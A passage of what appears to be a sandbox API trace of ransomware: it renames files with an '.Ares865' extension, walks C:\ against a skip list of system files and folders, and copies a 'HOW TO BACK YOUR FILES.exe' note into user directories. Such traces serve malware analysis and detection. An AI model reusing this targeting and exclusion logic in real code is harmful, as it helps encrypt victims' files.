-1 [0039.365] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\hiberfil.sys.Ares865") returned 23 [0039.365] MoveFileExW (lpExistingFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), lpNewFileName="C:\\hiberfil.sys.Ares865" (normalized: "c:\\hiberfil.sys.ares865"), dwFlags=0x1) returned 0 [0039.365] GetLastError () returned 0x20 [0039.365] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\hiberfil.sys MoveFileEx error 32\r\n") returned 45 [0039.365] lstrlenA (lpString="[ERROR] C:\\hiberfil.sys MoveFileEx error 32\r\n") returned 45 [0039.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0039.366] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x41b [0039.366] WriteFile (in: hFile=0xfc, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x2d, lpOverlapped=0x0) returned 1 [0039.366] CloseHandle (hObject=0xfc) returned 1 [0039.366] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0039.366] CloseHandle (hObject=0x0) returned 0 [0039.366] CloseHandle (hObject=0x0) returned 0 [0039.366] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x492bbea0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x492bbea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0039.367] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0039.367] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="aoldtz.exe") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2=".") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="..") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="windows") returned -1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="bootmgr") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="temp") returned -1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="pagefile.sys") returned -1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="boot") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="ids.txt") returned 1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="ntuser.dat") returned -1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="perflogs") returned -1 [0039.367] lstrcmpiW (lpString1="MSOCache", lpString2="MSBuild") returned 1 [0039.367] lstrlenW (lpString="MSOCache") returned 8 [0039.367] lstrlenW (lpString="C:\\hiberfil.sys") returned 15 [0039.367] lstrcpyW (in: lpString1=0x2cce406, lpString2="MSOCache" | out: lpString1="MSOCache") returned="MSOCache" [0039.367] SetFileAttributesW (lpFileName="C:\\MSOCache", dwFileAttributes=0x2012) returned 1 [0039.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7868 [0039.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2e7888 [0039.368] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7870 | out: ListHead=0x2e7710, ListEntry=0x2e7870) returned 0x2e7850 [0039.368] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="aoldtz.exe") returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2=".") returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="..") returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="windows") returned -1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootmgr") returned 1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="temp") returned -1 [0039.368] lstrcmpiW (lpString1="pagefile.sys", lpString2="pagefile.sys") returned 0 [0039.368] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="aoldtz.exe") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2=".") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="..") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="windows") returned -1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="bootmgr") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="temp") returned -1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="pagefile.sys") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="boot") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="ids.txt") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="ntuser.dat") returned 1 [0039.368] lstrcmpiW (lpString1="PerfLogs", lpString2="perflogs") returned 0 [0039.368] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3e8ffc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e8ffc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0039.368] lstrcmpiW (lpString1="Program Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.368] lstrcmpiW (lpString1="Program Files", lpString2="aoldtz.exe") returned 1 [0039.368] lstrcmpiW (lpString1="Program Files", lpString2=".") returned 1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="..") returned 1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="windows") returned -1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="bootmgr") returned 1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="temp") returned -1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="pagefile.sys") returned 1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="boot") returned 1 [0039.369] lstrcmpiW (lpString1="Program Files", lpString2="ids.txt") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files", lpString2="ntuser.dat") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files", lpString2="perflogs") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files", lpString2="MSBuild") returned 1 [0039.370] lstrlenW (lpString="Program Files") returned 13 [0039.370] lstrlenW (lpString="C:\\MSOCache") returned 11 [0039.370] lstrcpyW (in: lpString1=0x2cce406, lpString2="Program Files" | out: lpString1="Program Files") returned="Program Files" [0039.370] SetFileAttributesW (lpFileName="C:\\Program Files", dwFileAttributes=0x10) returned 1 [0039.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78a8 [0039.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2ef830 [0039.370] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78b0 | out: ListHead=0x2e7710, ListEntry=0x2e78b0) returned 0x2e7870 [0039.370] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="aoldtz.exe") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="windows") returned -1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="bootmgr") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="temp") returned -1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="pagefile.sys") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="boot") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ids.txt") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="ntuser.dat") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="perflogs") returned 1 [0039.370] lstrcmpiW (lpString1="Program Files (x86)", lpString2="MSBuild") returned 1 [0039.370] lstrlenW (lpString="Program Files (x86)") returned 19 [0039.370] lstrlenW (lpString="C:\\Program Files") returned 16 [0039.370] lstrcpyW (in: lpString1=0x2cce406, lpString2="Program Files (x86)" | out: lpString1="Program Files (x86)") returned="Program Files (x86)" [0039.370] SetFileAttributesW (lpFileName="C:\\Program Files (x86)", dwFileAttributes=0x10) returned 1 [0039.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78c8 [0039.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2e) returned 0x2ecf78 [0039.371] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78d0 | out: ListHead=0x2e7710, ListEntry=0x2e78d0) returned 0x2e78b0 [0039.371] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x454b2140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x454b2140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="aoldtz.exe") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2=".") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="..") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="windows") returned -1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="bootmgr") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="temp") returned -1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="pagefile.sys") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="boot") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="ids.txt") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="ntuser.dat") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="perflogs") returned 1 [0039.371] lstrcmpiW (lpString1="ProgramData", lpString2="MSBuild") returned 1 [0039.371] lstrlenW (lpString="ProgramData") returned 11 [0039.371] lstrlenW (lpString="C:\\Program Files (x86)") returned 22 [0039.371] lstrcpyW (in: lpString1=0x2cce406, lpString2="ProgramData" | out: lpString1="ProgramData") returned="ProgramData" [0039.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78e8 [0039.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2c9398 [0039.371] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78f0 | out: ListHead=0x2e7710, ListEntry=0x2e78f0) returned 0x2e78d0 [0039.371] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="aoldtz.exe") returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2=".") returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="..") returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="windows") returned -1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="bootmgr") returned 1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="temp") returned -1 [0039.371] lstrcmpiW (lpString1="Recovery", lpString2="pagefile.sys") returned 1 [0039.372] lstrcmpiW (lpString1="Recovery", lpString2="boot") returned 1 [0039.372] lstrcmpiW (lpString1="Recovery", lpString2="ids.txt") returned 1 [0039.372] lstrcmpiW (lpString1="Recovery", lpString2="ntuser.dat") returned 1 [0039.372] lstrcmpiW (lpString1="Recovery", lpString2="perflogs") returned 1 [0039.372] lstrcmpiW (lpString1="Recovery", lpString2="MSBuild") returned 1 [0039.372] lstrlenW (lpString="Recovery") returned 8 [0039.372] lstrlenW (lpString="C:\\ProgramData") returned 14 [0039.372] lstrcpyW (in: lpString1=0x2cce406, lpString2="Recovery" | out: lpString1="Recovery") returned="Recovery" [0039.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7908 [0039.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2e7928 [0039.372] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7910 | out: ListHead=0x2e7710, ListEntry=0x2e7910) returned 0x2e78f0 [0039.372] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="aoldtz.exe") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="windows") returned -1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="bootmgr") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="temp") returned -1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="pagefile.sys") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="boot") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="ids.txt") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="ntuser.dat") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="perflogs") returned 1 [0039.372] lstrcmpiW (lpString1="System Volume Information", lpString2="MSBuild") returned 1 [0039.372] lstrlenW (lpString="System Volume Information") returned 25 [0039.372] lstrlenW (lpString="C:\\Recovery") returned 11 [0039.372] lstrcpyW (in: lpString1=0x2cce406, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0039.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0039.372] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e5f28 [0039.372] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7910 [0039.372] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="aoldtz.exe") returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2=".") returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="..") returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="windows") returned -1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="bootmgr") returned 1 [0039.372] lstrcmpiW (lpString1="Users", lpString2="temp") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="pagefile.sys") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="boot") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="ids.txt") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="ntuser.dat") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="perflogs") returned 1 [0039.373] lstrcmpiW (lpString1="Users", lpString2="MSBuild") returned 1 [0039.373] lstrlenW (lpString="Users") returned 5 [0039.373] lstrlenW (lpString="C:\\System Volume Information") returned 28 [0039.373] lstrcpyW (in: lpString1=0x2cce406, lpString2="Users" | out: lpString1="Users") returned="Users" [0039.373] SetFileAttributesW (lpFileName="C:\\Users", dwFileAttributes=0x10) returned 1 [0039.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0039.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2e7988 [0039.373] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0039.373] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0039.373] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0039.373] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0039.373] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0039.373] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0039.373] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0039.373] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0039.373] FindClose (in: hFindFile=0x2c9b10 | out: hFindFile=0x2c9b10) returned 1 [0039.373] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7970 [0039.373] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users", iMaxLength=260 | out: lpString1="C:\\Users") returned="C:\\Users" [0039.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0039.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0039.373] lstrlenW (lpString="C:\\Users") returned 8 [0039.373] lstrcatW (in: lpString1="", lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0039.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.378] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.378] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4932e2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4932e2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2c9b10 [0039.378] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.378] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.378] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.378] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4932e2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4932e2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.378] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.378] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.378] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.378] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.378] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="aoldtz.exe") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2=".") returned 1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="..") returned 1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="windows") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="bootmgr") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="temp") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="pagefile.sys") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="boot") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="ids.txt") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="ntuser.dat") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="perflogs") returned -1 [0039.378] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz", lpString2="MSBuild") returned -1 [0039.378] lstrlenW (lpString="5p5NrGJn0jS 